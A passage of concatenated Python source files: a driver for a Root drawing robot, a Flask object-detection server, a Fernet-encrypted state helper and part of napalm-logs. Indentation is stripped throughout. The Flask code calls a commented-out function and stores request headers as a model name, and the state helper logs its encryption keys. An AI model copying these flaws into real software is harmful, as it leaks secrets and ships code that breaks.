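# name whose UTF-8 encoding exceeds Packet.PAYLOAD_LEN bytes is trimmed one
# character at a time, and the bytes actually sent are returned.
#
#     sent = robot.set_name("a-very-long-robot-name-indeed")
#     assert sent is None or len(sent) <= Packet.PAYLOAD_LEN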
def get_name(self):
"""Requests the robot's name."""
self._tx_q.put((Packet(0, 2, 0), True))
def stop_and_reset(self):
"""Requests robot stop and cancel all pending actions."""
self._tx_q.put((Packet(0, 3, 0), False))
def enable_events(self):
"""Currently enables all events from the robot.
TODO: Request better documentation about the payload of
this packet and implement it.
"""
payload = bytes([0xFF] * Packet.PAYLOAD_LEN)
self._tx_q.put((Packet(0, 7, 0, payload=payload), False))
def disable_events(self):
"""Currently disables all events from the robot.
TODO: Request better documentation about the payload of
this packet and implement it.
"""
payload = bytes([0xFF] * Packet.PAYLOAD_LEN)
self._tx_q.put((Packet(0, 9, 0, payload=payload), False))
def get_enabled_events(self):
"""Request bitfield of enabled devices."""
self._tx_q.put((Packet(0, 11, 0), True))
def get_serial_number(self):
"""Request robot serial number."""
self._tx_q.put((Packet(0, 14, 0), True))
def set_motor_speeds(self, left, right):
"""Set left and right motor linear velocities.
Parameters
----------
left : int
Left motor speed in units of mm/s.
right : int
Right motor speed in units of mm/s.
"""
left = pack('>i', self._bound(left, -100, 100))
right = pack('>i', self._bound(right, -100, 100))
self._tx_q.put((Packet(1, 4, 0, payload=left + right), False))
def set_left_motor_speed(self, left):
"""Set left motor linear velocity.
Parameters
----------
left : int
Left motor speed in units of mm/s.
"""
left = pack('>i', self._bound(left, -100, 100))
self._tx_q.put((Packet(1, 6, 0, payload=left), False))
def set_right_motor_speed(self, right):
"""Set right motor linear velocity.
Parameters
----------
right : int
Right motor speed in units of mm/s.
"""
right = pack('>i', self._bound(right, -100, 100))
self._tx_q.put((Packet(1, 7, 0, payload=right), False))
def drive_distance(self, distance):
"""Drive in a straight line for a certain distance.
Parameters
----------
distance : int
Distance to travel in units of mm.
"""
self._tx_q.put((Packet(1, 8, 0, payload=pack('>i', distance)), True))
def rotate_angle(self, angle):
"""Turn the robot in place by a particular angle.
Parameters
----------
angle : int
Angle to turn in units of deci-degrees.
"""
self._tx_q.put((Packet(1, 12, 0, payload=pack('>i', angle)), True))
def drive_arc(self, angle, radius):
"""Drive in an arc subtending a particular angle along a circle.
Parameters
----------
angle : int
Angle of an arc to drive along, in deci-degrees.
radius : int
Radius of the circle upon which to travel.
"""
payload = pack('>ii', angle, radius)
self._tx_q.put((Packet(1, 27, 0, payload=payload), True))
def drive_xy(self, x, y):
"""Drive to a particular coordinate in the XY plane.
Parameters
----------
x : float
X coordinate to which to head.
y : float
Y coordinate to which to head.
"""
self.drive_complex(x + y * 1j)
def drive_complex(self, coord):
"""Drive to a particular coordinate in the XY plane.
Parameters
----------
coord : complex
Coordinate to which to head, described as a complex number.
"""
vector = (coord - self._last_coord)
dist = numpy.linalg.norm(vector)
theta = numpy.angle(vector, deg=True)
theta_x10 = int(theta * 10)
turn = ((self._last_theta_x10 - theta_x10 + 1800) % 3600) - 1800
dist = int(dist)
#print(self._last_theta_x10, '->', theta_x10, ':', turn)
#print('turn', turn/10, ' drive', dist)
self.rotate_angle(turn)
self.drive_distance(dist)
self._last_coord = (numpy.real(self._last_coord) + dist * numpy.cos(theta_x10/10*numpy.pi/180)) + \
(numpy.imag(self._last_coord) + dist * numpy.sin(theta_x10/10*numpy.pi/180))*1j
self._last_theta_x10 = theta_x10
marker_up_eraser_up = 0
marker_down_eraser_up = 1
marker_up_eraser_down = 2
def set_marker_eraser_pos(self, pos):
"""Set the Marker/Eraser actuator to a particular position.
Parameters
----------
pos : byte
Byte describing the position to acquire.
For convenience, the following constants are defined.
* marker_up_eraser_up
* marker_down_eraser_up
* marker_up_eraser_down
"""
pos = self._bound(pos, 0, 2)
#print('Set pen', pos)
self._tx_q.put((Packet(2, 0, 0, payload=bytes([pos])), True))
led_animation_off = 0
led_animation_on = 1
led_animation_blink = 2
led_animation_spin = 3
def set_led_animation(self, state, red, green, blue):
"""Animate the LED lights on top of the robot.
Parameters
----------
state : byte
Byte describing the animation style.
For convenience, the following constants are defined.
* led_animation_off
* led_animation_on
* led_animation_blink
* led_animation_spin
red : byte
Brightness level of the red channel.
green : byte
Brightness level of the green channel.
blue : byte
Brightness level of the blue channel.
"""
payload = bytes([self._bound(state, 0, 3), red, green, blue])
self._tx_q.put((Packet(3, 2, 0, payload=payload), False))
def get_color_sensor_data(self, bank, lighting, fmt):
"""Request raw color sensor data.
Parameters
----------
bank : byte
Which of the four sensor banks to read.
lighting : byte
Which of the five lighting styles to use for illumination.
fmt : byte
Which of the two data formats to return.
"""
bank = self._bound(bank, 0, 3)
lighting = self._bound(lighting, 0, 4)
fmt = self._bound(fmt, 0, 1)
payload = bytes([bank, lighting, fmt])
self._tx_q.put((Packet(4, 1, 0, payload=payload), True))
def play_note(self, frequency, duration):
"""Play a frequency using the buzzer.
Parameters
----------
frequency : int
Frequency of square wave to play, in units of Hertz
duration : int
Duration to play, in units of milliseconds
"""
payload = pack('>IH', frequency, duration)
self._tx_q.put((Packet(5, 0, 0, payload=payload), True))
def stop_note(self):
"""Stop playing sound through the buzzer immediately."""
self._tx_q.put((Packet(5, 1, 0), False))
def say_phrase(self, phrase):
"""Speak a phrase in Root's language.
Parameters
----------
phrase : str
Phrase to "speak."
Returns
-------
utf_phrase: bytes
Actual phrase may be truncated to fit in packet payload.
Returns None if phrase cannot be converted.
"""
# TODO: loop over a longer string with multiple packets and responses
try:
utf_phrase = phrase.encode('utf-8')
while len(utf_phrase) > Packet.PAYLOAD_LEN:
phrase = phrase[:-1]
utf_phrase = phrase.encode('utf-8')
except AttributeError:
return None
self._tx_q.put((Packet(5, 4, 0, payload=utf_phrase), True))
def get_light_sensor_data(self):
"""Request raw light sensor data."""
self._tx_q.put((Packet(13, 1, 0), True))
def get_battery_level(self):
"""Request the current battery level."""
self._tx_q.put((Packet(14, 1, 0), True))
@staticmethod
def _bound(value, low, high):
"""Helper function to keep numbers in bounds.
Parameters
----------
value : number
Value to keep in bounds.
low : number
Minimum of bounds check.
high : number
Maximum of bounds check.
Returns
-------
new_value
The value clamped to lie between low and high, inclusive.
"""
return min(high, max(low, value))
@staticmethod
def _calculate_timeout(packet):
"""Helper function to calculate a timeout for packets expecting a response.
Parameters
----------
packet : Packet
Packet for which to calculate a timeout
Returns
-------
timeout : float
Number of seconds to wait for message receipt.
"""
timeout = 4 # minimum to wait
cmd_type = (packet.dev, packet.cmd)
if cmd_type == (1, 8): # drive distance
distance = unpack('>i', packet.payload[0:4])
timeout += 1 + abs(*distance) / 10 # mm/s, drive speed
elif cmd_type == (1, 12): # rotate angle
angle = unpack('>i', packet.payload[0:4])
timeout += 1 + abs(*angle) / 1000 # decideg/s
elif cmd_type == (2, 0): # set marker/eraser position
timeout += 1
elif cmd_type == (5, 0): # play note finished
duration, = unpack('>H', packet.payload[4:6])
timeout += duration / 1000 # ms/s
elif cmd_type == (5, 4): # say phrase finished
timeout += 16 # need to figure out how to calculate this
return timeout
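# Worked example (illustrative): a drive_distance(500) request is packed as
# dev=1, cmd=8 with a 500 mm payload, so its timeout is 4 + 1 + 500/10 = 55 s.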
def _responses_pending(self):
"""Helper function to determine whether any response packets are pending.
Returns
-------
value : bool
True if any response packets are pending.
"""
self.pending_lock.acquire()
pending_resp_len = len(self.pending_resp)
self.pending_lock.release()
return pending_resp_len > 0
def transmissions_pending(self):
"""Helper function to determine whether any transmissions are
waiting to be sent.
Returns
-------
value : bool
True if any transmissions are pending.
"""
return not self._tx_q.empty()
def _sending_thread(self):
"""Manages the sending of packets to the robot.
Sends messages in order from the tx queue, waiting if any
messages have responses pending.
If sniff mode is on, will print packet to standard out as it's sent.
"""
inc = 0
while self._phy.is_connected():
# block sending new commands until no responses pending
if self._responses_pending():
continue
if not self._tx_q.empty():
packet, expectResponse = self._tx_q.get()
packet.inc = inc
if expectResponse:
self.pending_lock.acquire()
# need a timeout because responses are not guaranteed.
resp_expire = time.time() + self._calculate_timeout(packet)
self.pending_resp.append(
(packet, resp_expire))
self.pending_lock.release()
self._phy.send_raw(packet.bytes)
if self.sniff_mode:
print('>>>', list(packet.bytes))
inc += 1
if inc > 255:
inc = 0
def _expiration_thread(self):
"""Manages the expiration of packets in the receiving queue."""
def tfilter(x, t):
if t < x[1]:
return True
print("Warning: message with header {} expired!".format([x[0].dev, x[0].cmd, x[0].inc]))
return False
while self._phy.is_connected():
time.sleep(0.5)
self.pending_lock.acquire()
now = time.time()
self.pending_resp = [x for x in self.pending_resp if tfilter(x, now)]
self.pending_lock.release()
supported_devices = { 0: 'General',
1: 'Motors',
2: 'MarkEraser',
4: 'Color',
12: 'Bumper',
13: 'Light',
14: 'Battery',
17: 'Touch',
20: 'Cliff'}
virtual_devices = { 4: 'ColorRaw',
13: 'LightRaw'}
event_messages = ( ( 0, 4),
( 1, 29),
( 4, 2),
(12, 0),
(13, 0),
(14, 0),
(17, 0),
(20, 0) )
resp_msg_acked = ( (1, 8),
(1, 12),
(1, 27),
(5, 0),
(5, 4) )
def _receiving_thread(self):
"""Manages the receipt of packets from the robot.
Interprets packets received in the rx queue in order and
acts upon them, if necessary.
If sniff mode is set, will print packets to standard out as
they are received.
"""
last_event = 255
while self._phy.is_connected():
if self._rx_q is not None and not self._rx_q.empty():
packet = Packet.from_bytes(self._rx_q.get())
state = packet.payload[4]
crc_fail = not packet.check_crc()
event_fail = None
if (packet.dev, packet.cmd) in self.event_messages:
event_fail = (packet.inc - last_event) & 0xFF != 1
last_event = packet.inc
if self.sniff_mode:
print('C' if crc_fail else ' ', 'E' if event_fail else ' ', list(packet.bytes) )
if crc_fail and not self.ignore_crc_errors:
continue
dev_name = self.supported_devices[packet.dev] if packet.dev in self.supported_devices else None
if (packet.dev, packet.cmd) in self.event_messages:
if dev_name == 'General' and packet.cmd == 4: # stop project
print('Warning: Stop Project!')
self.stop_project_flag.set()
# purge all pending transmissions
while not self._tx_q.empty():
packet, expectResponse = self._tx_q.get()
# stop waiting for any responses
self.pending_lock.acquire()
self.pending_resp.clear()
self.pending_lock.release()
elif dev_name == 'Motors' and packet.cmd == 29: # motor stall
m = ['left', 'right', 'markeraser']
c = ['none', 'overcurrent', 'undercurrent', 'underspeed', 'saturated', 'timeout']
print("Stall: {} motor {}.".format(m[state], c[packet.payload[5]]))
elif dev_name == 'Color' and packet.cmd == 2:
if self.state[dev_name] is None:
self.state[dev_name] = [0]*32
i = 0
for byte in packet.payload:
self.state[dev_name][i*2+0] = (byte & 0xF0) >> 4
self.state[dev_name][i*2+1] = byte & 0x0F
i += 1
elif dev_name == 'Bumper' and packet.cmd == 0:
if state == 0:
self.state[dev_name] = (False, False)
elif state == 0x40:
self.state[dev_name] = (False, True)
elif state == 0x80:
self.state[dev_name] = (True, False)
elif state == 0xC0:
self.state[dev_name] = (True, True)
else:
self.state[dev_name] = packet.payload
elif dev_name == 'Light' and packet.cmd == 0:
if state == 4:
self.state[dev_name] = (False, False)
elif state == 5:
self.state[dev_name] = (False, True)
elif state == 6:
self.state[dev_name] = (True, False)
elif state == 7:
self.state[dev_name] = (True, True)
else:
self.state[dev_name] = packet.payload
elif dev_name == 'Battery' and packet.cmd == 0:
self.state[dev_name] = packet.payload[6]
elif dev_name == 'Touch' and packet.cmd == 0:
if self.state[dev_name] is None:
self.state[dev_name] = {}
self.state[dev_name]['FL'] = state & 0x80 == 0x80
self.state[dev_name]['FR'] = state & 0x40 == 0x40
self.state[dev_name]['RR'] = state & 0x20 == 0x20
self.state[dev_name]['RL'] = state & 0x10 == 0x10
elif dev_name == 'Cliff' and packet.cmd == 0:
self.state[dev_name] = state == 1
else:
self.state[dev_name] = packet.bytes
print('Unhandled event message from ' + dev_name)
print(list(packet.bytes))
else: # response message
orig_packet = None
self.pending_lock.acquire()
# see if (dev, cmd, inc, _) exists in pending_resp
result = [
resp for resp in self.pending_resp
if (resp[0].dev == packet.dev
and resp[0].cmd == packet.cmd
and resp[0].inc == packet.inc)
]
#print(result)
if len(result) != 1:
print('Warning: unexpected response for message',
packet.dev, packet.cmd, packet.inc)
else:
#print ('got resp for', result[0][0].dev, result[0][0].cmd, result[0][0].inc)
orig_packet = result[0][0]
self.pending_resp.remove(result[0])
self.pending_lock.release()
if (packet.dev, packet.cmd) in self.resp_msg_acked:
pass # no side effects
elif dev_name == 'General':
if self.state[dev_name] is None:
self.state[dev_name] = {}
if packet.cmd == 0: # get versions
self.state[dev_name][packet.payload[0]] = packet.payload[1] + packet.payload[2] / 1000
elif packet.cmd == 2: # get name
self.state[dev_name]['Name'] = packet.payload.decode('utf-8').rstrip('\0')
elif packet.cmd == 11: # get enabled events
self.state[dev_name]['EnabledEvents'] = packet.payload
elif packet.cmd == 14: # get serial number
self.state[dev_name]['Serial'] = packet.payload.decode('utf-8').rstrip('\0')
elif dev_name == 'MarkEraser' and packet.cmd == 0: # set marker/eraser position
pos = packet.payload[0]
if pos == 0:
self.state[dev_name] = 'marker_up_eraser_up'
elif pos == 1:
self.state[dev_name] = 'marker_down_eraser_up'
elif pos == 2:
self.state[dev_name] = 'marker_up_eraser_down'
else:
self.state[dev_name] = pos # undefined
elif dev_name == 'Color' and packet.cmd == 1 and orig_packet is not None:
if self.state['ColorRaw'] is None:
self.state['ColorRaw'] = [ [None]*32 for _ in range(5) ]
offset = orig_packet.payload[0] * 8
for i in range(8):
self.state['ColorRaw'][orig_packet.payload[1]][offset + i] = \
packet.payload[i*2]*256 + packet.payload[i*2+1]
elif dev_name == 'Light' and packet.cmd == 1 and orig_packet is not None:
if self.state['LightRaw'] is None:
self.state['LightRaw'] = [None]*2
for i in range(2):
self.state['LightRaw'][i] = \
packet.payload[i*2+4]*256 + packet.payload[i*2+5]
elif dev_name == 'Battery' and packet.cmd == 1: # get battery level
self.state[dev_name] = packet.payload[6]
else:
print('Unsupported message ', list(packet.bytes))
def get_sniff_mode(self):
"""Helper function to determine whether we are in sniff mode."""
return self.sniff_mode
def set_sniff_mode(self, mode):
"""Helper function to set sniff mode on or off.
Parameters
----------
mode : bool
True to turn sniff mode on; False to turn it off.
"""
self.sniff_mode = bool(mode)
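# Minimal usage sketch (hypothetical; `Root` stands in for whatever class above
# exposes these methods once its transport is connected):
# robot = Root()
# robot.set_marker_eraser_pos(Root.marker_down_eraser_up)
# robot.drive_distance(100) # straight line, 100 mm
# robot.rotate_angle(900) # turn 90 degrees (angles are in deci-degrees)
# robot.play_note(440, 500) # 440 Hz for 500 ms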
|
flask_server.py
|
from datetime import datetime
import threading
from flask import Flask, request, jsonify
import os
import sys
import numpy as np
import json
import cv2
from maskrcnn_benchmark.config import cfg
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.structures.bounding_box import BoxList
from predictor import COCODemo
from train import TrainingThread
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
import time
class FlaskServer(object):
def __init__(self, args):
self.model = None
self.PORT = args.PORT
self.HOST = args.HOST
self.architecture = args.ARCH #"R_50_C4_1x" # architecture for FasterRCNN
self.weight = args.WEIGHT
self.args = args
# self.training_thread = threading.Thread(
# target=self.training_in_background)
def setup(self):
# self.project = "Seeds_Striga_Strategy1" # project
self.model = None # FasterRCNN model
# print(list_project())
# print(list_architecture())
initialize_model()
app.run(host=self.HOST, port=self.PORT)
# def training_in_background(self, t=10):
# print("hello from training")
# time.sleep(t)
# print("hello again after 10sec")
app = Flask(__name__)
@app.route("/") # main webpage
def home():
return "Hello world!"
@app.route("/api/list_projects", methods=['POST'])
def list_project():
return jsonify(os.listdir(args.DATA_FOLDER)) # e.g. ["Seeds", "Pills", "Spine", "Fish"]
# @app.route("/api/list_architecture", methods=['POST'])
# def list_architecture():
# folder_architectures = os.path.join(
# args.DATA_FOLDER, server.project, "output")
# return os.listdir(folder_architectures)
@app.route("/api/select_project", methods=['POST'])
def select_project():
headers = request.headers
print(headers)
# server.project = headers
server.architecture = list_architecture()[0]
err = initialize_model()
result = jsonify({'Error': err,
})
print(result)
return result
@app.route("/api/select_architecture", methods=['POST'])
def select_architecture():
headers = request.headers
print(headers)
server.architecture = headers
err = initialize_model()
result = jsonify({'Error': err,
})
print(result)
return result
def initialize_model():
# Initialize the model
# args: None
# return: [boolean]: Error loading model
config_file = f"./configs/e2e_faster_rcnn_{server.architecture}.yaml"
print(f'trying to load model from {config_file}')
if not os.path.exists(config_file):
print("Dir does not exists")
return True
cfg.merge_from_file(config_file)
# os.path.join(args.DATA_FOLDER, args.WEIGHT)
cfg.DATASETS.DATA_DIR = os.path.join(args.DATA_FOLDER, args.PROJECT_FOLDER)
cfg.DATASETS.TRAIN = ['folder_train']
cfg.DATASETS.TEST = ['folder_test']
cfg.MODEL.ROI_BOX_HEAD.NUM_CLASSES=3
cfg.TEST.DETECTIONS_PER_IMG=200
cfg.MODEL.ROI_HEADS.DETECTIONS_PER_IMG=200
# cfg.RPN.NMS_THRESH = 0.7
cfg.MODEL.ROI_HEADS.NMS = 0.1 #0.5
# cfg.TEST.BBOX_AUG.ENABLED=True
# cfg.TEST.BBOX_AUG.H_FLIP=True
# cfg.OUTPUT_DIR = os.path.dirname(cfg.DATASETS.DATA_DIR)
cfg.OUTPUT_DIR = os.path.join(
# cfg.DATASETS.DATA_DIR, "output", server.architecture)
cfg.DATASETS.DATA_DIR, "output", args.WEIGHT)
# cfg.freeze()
# print(cfg.OUTPUT_DIR + "/model_bestval.pth")
server.model = COCODemo(
cfg,
min_image_size=800,
confidence_threshold=0.7,
weight_loading=cfg.OUTPUT_DIR + "/model_bestval.pth",
)
# Get list of CATEGORIES from dataloader
data_loader = make_data_loader(cfg, is_train=False)
server.model.CATEGORIES = data_loader[0].dataset.CLASSES
return False
# training_thread = threading.Thread(
# target=training_in_background)
# training_thread = threading.Thread()
@app.route("/api/train", methods=['POST'])
def train():
headers = request.headers
print(headers)
trainingCFG = {"project_ID": "Striga_Strategy1",
"training_images": ["image1", "image2"],
"validation_images": ["image1", "image2"],
"time": 12,
"asked_training_date": datetime.now().strftime("%H:%M:%S")}
ret = training_thread.append_training(trainingCFG)
if ret:
print("PROJECT alread in QUEUE")
else:
print("PROJECT QUEUED")
return jsonify({'asked_training': True,
'added_to_queue': ret,
})
@app.route("/api/predict", methods=['POST'])
def predict():
initialize_model()
headers = request.headers
print(headers)
print("got something")
if (headers["content-type"] == "image/jpeg") and server.model is not None:
# Read request
image_bytes = request.data
nparr = np.frombuffer(image_bytes,np.uint8)
image_bytes = cv2.imdecode(nparr, cv2.IMREAD_COLOR)
# compute prediction
predictions = server.model.compute_prediction(image_bytes)
# predictions = server.model.select_top_predictions(predictions)
print(predictions)
boxes = predictions.bbox.numpy().tolist()
# print("boxes", boxes)
# print(predictions.get_field("labels").numpy().tolist())
# print(server.model.CATEGORIES)
labels_words = [server.model.CATEGORIES[label]
for label in predictions.get_field("labels").numpy().tolist()]
scores = predictions.get_field("scores").numpy().tolist()
return jsonify({'boxes': boxes,
'labels_words': labels_words,
'scores': scores
})
if __name__ == "__main__":
parser = ArgumentParser(
description='Flask server exposing training and prediction endpoints for object detection',
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("--HOST", type=str, default="localhost",
help="host IP")
parser.add_argument("--PORT", type=int, default=5000,
help="commmunication port")
parser.add_argument("--DATA_FOLDER", type=str,
default="/media/giancos/Football/CloudLabeling_DS/CloudLabeling/",
help="main folder shere data and model is stored")
parser.add_argument("--PROJECT_FOLDER", type=str,
default="Seeds_Striga_Strategy1",
help="project folder where single project are held")
parser.add_argument("--ARCH", type=str,
default="R_50_C4_1x",
help="type of architecture to load the proper configuration file")
parser.add_argument("--WEIGHT", type=str,
default="R_50_C4_1x_pre_19",
help="folder where the model has been outputed, after training")
# parser.add_argument("--DATA_FOLDER", type=str,
# default="Seeds_Striga_Strategy1",
# help="main folder shere data and model is stored")
parser.add_argument(
'--GPU',
required=False,
type=int,
default=-1,
help='ID of the GPU to use')
args = parser.parse_args()
if args.GPU >= 0:
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.GPU)
training_thread = TrainingThread()
training_thread.start()
server = FlaskServer(args)
server.setup()
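# Example client call (illustrative only; assumes the server is reachable on
# localhost:5000 and a model can be loaded by initialize_model()):
# import requests
# with open('sample.jpg', 'rb') as f:
# r = requests.post('http://localhost:5000/api/predict',
# data=f.read(), headers={'content-type': 'image/jpeg'})
# print(r.json()['boxes'], r.json()['labels_words'], r.json()['scores'])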
|
state.py
|
import logging
import pickle
import threading
import time
from typing import List
import schedule as schedule
from cryptography.fernet import Fernet, MultiFernet, InvalidToken
SCHEDULER_SLEEP_TIME = 1
REASONABLE_NUMBER_OF_KEYS = 500
class StateEncryptor(object):
def __init__(self, state_aging_tolerance: int = 120, key_renewal_frequency: int = 30):
if state_aging_tolerance <= 0:
raise ValueError("Bad state_aging_tolerance")
if key_renewal_frequency < 0:
raise ValueError("Bad key_renewal_frequency")
self.__state_aging_tolerance: int = state_aging_tolerance
self.__key_renewal_frequency: int = key_renewal_frequency
self.__max_keys = 1
if key_renewal_frequency > 0:
if state_aging_tolerance < key_renewal_frequency:
self.__max_keys += 1
else:
self.__max_keys += state_aging_tolerance // key_renewal_frequency
if self.__max_keys >= REASONABLE_NUMBER_OF_KEYS:
raise ValueError(f"Keeping {self.__max_keys} keys is ridiculous.")
self.__keys: List[Fernet] = []
self.__renew_key()
self.__encryptor: MultiFernet = MultiFernet(self.__keys)
self.__thread_stop_event = threading.Event()
def __renew_key(self):
self.__keys.insert(0, Fernet(Fernet.generate_key()))
self.__keys = self.__keys[:self.__max_keys]
logging.debug(self.__keys)
self.__encryptor = MultiFernet(self.__keys)
def start(self):
schedule.every(self.__key_renewal_frequency).seconds.do(self.__renew_key)
thread = threading.Thread(target=self.__run_scheduler)
thread.start()
def stop(self):
self.__thread_stop_event.set()
def __run_scheduler(self):
while not self.__thread_stop_event.is_set():
schedule.run_pending()
time.sleep(SCHEDULER_SLEEP_TIME)
@property
def max_keys(self):
return self.__max_keys
def encrypt_state(self, state: object) -> bytes:
state_serialization = pickle.dumps(state)
fernet_token = self.__encryptor.encrypt(state_serialization)
return fernet_token
def decrypt_state(self, encrypted_state: bytes) -> object:
try:
decrypted_state = self.__encryptor.decrypt(encrypted_state, self.__state_aging_tolerance)
state = pickle.loads(decrypted_state)
except InvalidToken as e:
raise ValueError("Cannot decrypt state") from e
return state
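# Usage sketch (matches the API above; timings are illustrative):
# encryptor = StateEncryptor(state_aging_tolerance=120, key_renewal_frequency=30)
# encryptor.start() # rotates Fernet keys every 30 s in a background thread
# token = encryptor.encrypt_state({'step': 3})
# assert encryptor.decrypt_state(token) == {'step': 3}
# encryptor.stop()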
|
base.py
|
# -*- coding: utf-8 -*-
'''
napalm-logs base
'''
from __future__ import absolute_import
# Import std lib
import os
import re
import imp
import sys
import time
import yaml
import logging
import threading
from multiprocessing import Process
# Import third party libs
try:
import sentry_sdk
HAS_SENTRY = True
except ImportError:
HAS_SENTRY = False
# crypto
import nacl.utils
import nacl.secret
import nacl.signing
import nacl.encoding
from prometheus_client import start_http_server, CollectorRegistry, multiprocess
# Import napalm-logs pkgs
import napalm_logs.utils
import napalm_logs.config as CONFIG
import napalm_logs.buffer
# processes
from napalm_logs.auth import NapalmLogsAuthProc
from napalm_logs.device import NapalmLogsDeviceProc
from napalm_logs.server import NapalmLogsServerProc
from napalm_logs.publisher import NapalmLogsPublisherProc
from napalm_logs.listener_proc import NapalmLogsListenerProc
from napalm_logs.pub_proxy import NapalmLogsPublisherProxy
# exceptions
from napalm_logs.exceptions import ConfigurationException
log = logging.getLogger(__name__)
class NapalmLogs:
def __init__(
self,
address='0.0.0.0',
port=514,
listener='udp',
publisher='zmq',
publish_address='0.0.0.0',
publish_port=49017,
auth_address='0.0.0.0',
auth_port=49018,
metrics_enabled=False,
metrics_address='0.0.0.0',
metrics_port='9215',
metrics_dir='/tmp/napalm_logs_metrics',
certificate=None,
keyfile=None,
disable_security=False,
config_path=None,
config_dict=None,
extension_config_path=None,
extension_config_dict=None,
log_level='warning',
log_format='%(asctime)s,%(msecs)03.0f [%(name)-17s][%(levelname)-8s] %(message)s',
device_blacklist=[],
device_whitelist=[],
hwm=None,
device_worker_processes=1,
serializer='msgpack',
buffer=None,
opts=None,
):
'''
Init the napalm-logs engine.
:param address: The address to bind the syslog client. Default: 0.0.0.0.
:param port: Listen port. Default: 514.
:param listener: Listen type. Default: udp.
:param publish_address: The address to bind when publishing the OC
objects. Default: 0.0.0.0.
:param publish_port: Publish port. Default: 49017.
'''
self.opts = opts if opts else {}
sentry_dsn = self.opts.get('sentry_dsn') or os.getenv('SENTRY_DSN')
if sentry_dsn:
if HAS_SENTRY:
sentry_sdk.init(
sentry_dsn,
**self.opts.get('sentry_opts', {'traces_sample_rate': 1.0})
)
else:
log.warning(
'Sentry DSN provided, but the sentry_sdk library is not installed'
)
self.address = address
self.port = port
self.listener = listener
self.publisher = publisher
self.publish_address = publish_address
self.publish_port = publish_port
self.auth_address = auth_address
self.auth_port = auth_port
self.metrics_enabled = metrics_enabled
self.metrics_address = metrics_address
self.metrics_port = metrics_port
self.metrics_dir = metrics_dir
self.certificate = certificate
self.keyfile = keyfile
self.disable_security = disable_security
self.config_path = config_path
self.config_dict = config_dict
self.extension_config_path = extension_config_path
self.extension_config_dict = extension_config_dict
self.log_level = log_level
self.log_format = log_format
self.device_whitelist = device_whitelist
self.device_blacklist = device_blacklist
self.serializer = serializer
self.device_worker_processes = device_worker_processes
self.hwm = hwm
self._buffer_cfg = buffer
self._buffer = None
# Setup the environment
self._setup_log()
self._build_config()
self._verify_config()
self._post_preparation()
# Start the Prometheus metrics server
self._setup_metrics()
self._setup_buffer()
# Private vars
self.__priv_key = None
self.__signing_key = None
self._processes = []
self.up = True
def _exit_gracefully(self, signum, _):
self.stop_engine()
def __exit__(self, exc_type, exc_value, exc_traceback):
self.stop_engine()
if exc_type is not None:
log.error('Exiting due to unhandled exception', exc_info=True)
self.__raise_clean_exception(exc_type, exc_value, exc_traceback)
def _setup_buffer(self):
'''
Setup the buffer subsystem.
'''
if not self._buffer_cfg or not isinstance(self._buffer_cfg, dict):
return
buffer_name = list(self._buffer_cfg.keys())[0]
buffer_class = napalm_logs.buffer.get_interface(buffer_name)
log.debug('Setting up buffer interface "%s"', buffer_name)
if 'expire_time' not in self._buffer_cfg[buffer_name]:
self._buffer_cfg[buffer_name]['expire_time'] = CONFIG.BUFFER_EXPIRE_TIME
self._buffer = buffer_class(**self._buffer_cfg[buffer_name])
def _setup_metrics(self):
"""
Start metric exposition
"""
path = os.environ.get("prometheus_multiproc_dir")
if not os.path.exists(self.metrics_dir):
try:
log.info("Creating metrics directory")
os.makedirs(self.metrics_dir)
except OSError:
log.error("Failed to create metrics directory!")
raise ConfigurationException("Failed to create metrics directory!")
path = self.metrics_dir
elif path != self.metrics_dir:
path = self.metrics_dir
os.environ['prometheus_multiproc_dir'] = path
log.info("Cleaning metrics collection directory")
log.debug("Metrics directory set to: {}".format(path))
files = os.listdir(path)
for f in files:
if f.endswith(".db"):
os.remove(os.path.join(path, f))
log.debug("Starting metrics exposition")
if self.metrics_enabled:
registry = CollectorRegistry()
multiprocess.MultiProcessCollector(registry)
start_http_server(
port=self.metrics_port, addr=self.metrics_address, registry=registry
)
def _setup_log(self):
'''
Setup the log object.
'''
logging_level = CONFIG.LOGGING_LEVEL.get(self.log_level.lower())
logging.basicConfig(format=self.log_format, level=logging_level)
def _post_preparation(self):
'''
The steps for post-preparation (when the logs, and everything is
already setup).
'''
self.opts['hwm'] = CONFIG.ZMQ_INTERNAL_HWM if self.hwm is None else self.hwm
self.opts['_server_send_unknown'] = False
for pub in self.publisher:
pub_name = list(pub.keys())[0]
pub_opts = list(pub.values())[0]
error_whitelist = pub_opts.get('error_whitelist', [])
error_blacklist = pub_opts.get('error_blacklist', [])
if 'UNKNOWN' not in error_blacklist:
# by default we should not send unknown messages
error_blacklist.append('UNKNOWN')
if 'RAW' not in error_blacklist:
# same with RAW
error_blacklist.append('RAW')
# This implementation is a bit sub-optimal, but more readable like
# that. It is executed only at the init, so just once.
if 'only_unknown' in pub_opts and pub[pub_name]['only_unknown']:
pub[pub_name]['send_unknown'] = True
error_whitelist = ['UNKNOWN']
error_blacklist = []
if 'only_raw' in pub_opts and pub[pub_name]['only_raw']:
pub[pub_name]['send_raw'] = True
error_whitelist = ['RAW']
error_blacklist = []
if 'send_unknown' in pub_opts and 'UNKNOWN' in error_blacklist:
error_blacklist.remove('UNKNOWN')
if 'send_raw' in pub_opts and 'RAW' in error_blacklist:
error_blacklist.remove('RAW')
self.opts['_server_send_unknown'] |= (
'UNKNOWN' in error_whitelist or 'UNKNOWN' not in error_blacklist
)
pub[pub_name]['error_whitelist'] = error_whitelist
pub[pub_name]['error_blacklist'] = error_blacklist
def _whitelist_blacklist(self, os_name):
'''
Determines if the OS should be ignored,
depending on the whitelist-blacklist logic
configured by the user.
'''
return napalm_logs.ext.check_whitelist_blacklist(
os_name, whitelist=self.device_whitelist, blacklist=self.device_blacklist
)
@staticmethod
def _extract_yaml_docstring(stream):
'''
Extract the comments at the top of the YAML file,
from the stream handler.
Return the extracted comment as string.
'''
comment_lines = []
lines = stream.read().splitlines()
for line in lines:
line_strip = line.strip()
if not line_strip:
continue
if line_strip.startswith('#'):
comment_lines.append(line_strip.replace('#', '', 1).strip())
else:
break
return ' '.join(comment_lines)
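# Illustrative input/output for the helper above: a stream whose first lines are
# # BGP prefix limit exceeded
# # Applies to Junos devices.
# messages: ...
# yields the string 'BGP prefix limit exceeded Applies to Junos devices.'.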
def _load_config(self, path):
'''
Read the configuration under a specific path
and return the object.
'''
